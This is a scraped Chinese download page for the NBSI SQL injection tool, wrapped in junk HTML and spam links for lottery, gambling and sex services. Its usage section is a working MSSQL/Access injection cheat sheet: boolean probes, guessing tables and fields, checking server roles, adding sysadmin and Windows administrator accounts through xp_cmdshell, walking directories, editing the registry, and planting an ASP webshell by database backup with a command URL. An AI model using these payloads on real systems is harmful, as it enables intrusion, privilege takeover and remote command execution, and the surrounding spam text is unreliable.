• <output id="hllwf"><button id="hllwf"><address id="hllwf"></address></button></output>

      1. <label id="hllwf"></label>
      2. <label id="hllwf"><pre id="hllwf"></pre></label>

      3. <var id="hllwf"></var>
          <output id="hllwf"><pre id="hllwf"></pre></output>

                極光下載站 - 打造齊全的綠色軟件家園

                極光下載站

                當前位置: 首頁安全相關系統監視 → nbsi檢測工具 v3.2 綠色版

                nbsi檢測工具nbsi檢測工具 v3.2 綠色版

                • 軟件大小:908KB
                • 軟件語言:簡體中文
                • 更新時間:2019-04-24
                • 軟件授權:免費下載
                • 軟件類型:國產軟件
                • 軟件類別:系統監視
                • 運行環境:WinAll, WinXP, Win7, Win10
                • 軟件等級 :
                • 安全檢測: 360安全衛士 360殺毒 電腦管家
                • 官方主頁:暫無
                • 軟件廠商:

                軟件介紹

                • 介紹說明
                • 下載地址
                • 精品推薦
                • 相關軟件
                • 網友評論

                nbsi檢測工具有著強大的檢測功能,可以幫助用戶更好的對網站進行檢測漏洞,有著快速高效的運轉效率,幫助工作人員極大的提升了使用時間,并且有著準確的檢查結果顯示,有需要的用戶就來極光下載站試試吧!

                nbsi軟件簡介

                nbsi(網站安全漏洞檢測工具,又叫sql注入分析器)是一套高集成性web安全檢測系統,是由nb聯盟編寫的一個非常強的sql注入工具。經長時間的更新優化,在asp程序漏洞分析方面已經遠遠超越于同類產品。nbsi分為個人版和商業版兩種,個人版只能檢測出一般網站的漏洞,而商業版則沒有完全限制,且其分析范圍和準確率都所有提升。

                nbsi軟件

                特點

                1.專業程度很高,能夠非常完美的為你檢測到漏洞并消滅它

                2.軟件體積小巧,運行起來速度快并且幾乎不占用什么系統內存

                3.兼容性非常的強大,可以支持電腦系統或者是網站上的漏洞選擇

                注意事項

                1.下載文件找到“nbsi.exe”雙擊運行,進入軟件

                2.系統設置包括了開始域名、域名的總數、日志等

                3.cms識別包括了配置、導入域名、導入、當前識別、識別的結果、cms程序等

                4.漏洞掃描包括了導入域名、域名總數、通用的cms漏洞、通用組件漏洞等

                5.目錄掃描包括了域名,導入、指紋識別、急速掃描、精確掃描等

                使用說明

                1.判斷是否有注入

                ;and 1=1

                ;and 1=2

                2.初步判斷是否是mssql

                ;and user>0

                3.判斷數據庫系統

                ;and (select count(*) from sysobjects)>0 mssql

                ;and (select count(*) from msysobjects)>0 access

                4.注入參數是字符

                'and [查詢條件] and ''='

                5.搜索時沒過濾參數的

                'and [查詢條件] and '%25'='

                6.猜數據庫

                ;and (select count(*) from [數據庫名])>0

                7.猜字段

                ;and (select count(字段名) from 數據庫名)>0

                8.猜字段中記錄長度

                ;and (select top 1 len(字段名) from 數據庫名)>0

                9.(1)猜字段的ascii值(access)

                ;and (select top 1 asc(mid(字段名,1,1)) from 數據庫名)>0

                (2)猜字段的ascii值(mssql)

                ;and (select top 1 unicode(substring(字段名,1,1)) from 數據庫名)>0

                10.測試權限結構(mssql)

                ;and 1=(select is_srvrolemember('sysadmin'));--

                ;and 1=(select is_srvrolemember('serveradmin'));--

                ;and 1=(select is_srvrolemember('setupadmin'));--

                ;and 1=(select is_srvrolemember('securityadmin'));--

                ;and 1=(select is_srvrolemember('diskadmin'));--

                ;and 1=(select is_srvrolemember('bulkadmin'));--

                ;and 1=(select is_member('db_owner'));--

                11.添加mssql和系統的帳戶

                ;exec master.dbo.sp_addlogin username;--

                ;exec master.dbo.sp_password null,

                username,password;--

                ;exec master.dbo.sp_addsrvrolemember sysadmin

                username;--

                ;exec master.dbo.xp_cmdshell 'net user username

                password /workstations:* /times:all

                /passwordchg:yes /passwordreq:yes /active:yes /add'

                ;--

                ;exec master.dbo.xp_cmdshell 'net user username

                password /add';--

                ;exec master.dbo.xp_cmdshell 'net localgroup

                administrators username /add';--

                12.(1)遍歷目錄

                ;create table dirs(paths varchar(100), id int)

                ;insert dirs exec master.dbo.xp_dirtree 'c:\'

                ;and (select top 1 paths from dirs)>0

                ;and (select top 1 paths from dirs where paths not

                in('上步得到的paths'))>)

                (2)遍歷目錄

                ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

                ;insert temp exec master.dbo.xp_availablemedia;-- 獲得當前所有驅動器

                ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 獲得子目錄列表

                ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 獲得所有子目錄的目錄樹結構

                ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的內容

                13.mssql中的存儲過程

                xp_regenumvalues 注冊表根鍵, 子鍵

                ;exec xp_regenumvalues 'hkey_local_machine',

                'software\microsoft\windows\currentversion\run' 以多個記錄集方式返回所有鍵值

                xp_regread 根鍵,子鍵,鍵值名

                ;exec xp_regread 'hkey_local_machine',

                'software\microsoft\windows\currentversion',

                'commonfilesdir' 返回制定鍵的值

                xp_regwrite 根鍵,子鍵, 值名, 值類型, 值

                值類型有2種reg_sz 表示字符型,reg_dword 表示整型

                ;exec xp_regwrite 'hkey_local_machine',

                'software\microsoft\windows\currentversion',

                'testvaluename','reg_sz','hello' 寫入注冊表

                xp_regdeletevalue 根鍵,子鍵,值名

                exec xp_regdeletevalue 'hkey_local_machine',

                'software\microsoft\windows\currentversion',

                'testvaluename' 刪除某個值

                xp_regdeletekey 'hkey_local_machine',

                'software\microsoft\windows\currentversion\testkey' 刪除鍵,包括該鍵下所有值

                14.mssql的backup創建webshell

                use model

                create table cmd(str image);

                insert into cmd(str) values ('<% dim oscript %>');

                backup database model to disk='c:\l.asp';

                15.mssql內置函數

                ;and (select @@version)>0 獲得windows的版本號

                ;and user_name()='dbo' 判斷當前系統的連接用戶是不是sa

                ;and (select user_name())>0 爆當前系統的連接用戶

                ;and (select db_name())>0 得到當前連接的數據庫

                16.簡潔的webshell

                use model

                create table cmd(str image);

                insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');

                backup database model to disk='g:\wwwtest\l.asp';

                請求的時候,像這樣子用:

                http://ip/l.asp?c=dir

                更新日志

                nbsi3.0

                修復http發包api錯誤問題

                優化字典,刪了10萬無用字典

                顯示狀態可是設置提示那些狀態碼或者不提示那些狀態碼

                解壓密碼:www.ksxo.net

                下載地址

                • PC版

                普通下載地址:

                精品推薦

                相關軟件

                查看所有評論+

                網友評論

                網友
                您的評論需要經過審核才能顯示

                本類排名

                本類推薦

                相關資訊

                nbsi檢測工具正在下載,用戶還下載了

                關閉

                公眾號

                时时彩技巧
              1. <output id="hllwf"><button id="hllwf"><address id="hllwf"></address></button></output>

                  1. <label id="hllwf"></label>
                  2. <label id="hllwf"><pre id="hllwf"></pre></label>

                  3. <var id="hllwf"></var>
                      <output id="hllwf"><pre id="hllwf"></pre></output>

                          1. <output id="hllwf"><button id="hllwf"><address id="hllwf"></address></button></output>

                              1. <label id="hllwf"></label>
                              2. <label id="hllwf"><pre id="hllwf"></pre></label>

                              3. <var id="hllwf"></var>
                                  <output id="hllwf"><pre id="hllwf"></pre></output>

                                        浙江十一选五根据什么来出号码的 哪个番号最好看 葫芦娃49游版本下载 山西11选5任5最大遗漏 ag电子游戏最新网站 腾讯五分彩时时彩计划软件 17175鱼达人 骰宝押大小技巧集锦 上证指数000001 山西十一选五任五最大遗漏数据 重庆时时的正规网址 中山足浴特殊服务 pookcom官方网站 安徽11选5开奖结果开奖 股票分析软件 浙江11选5技巧和实战攻略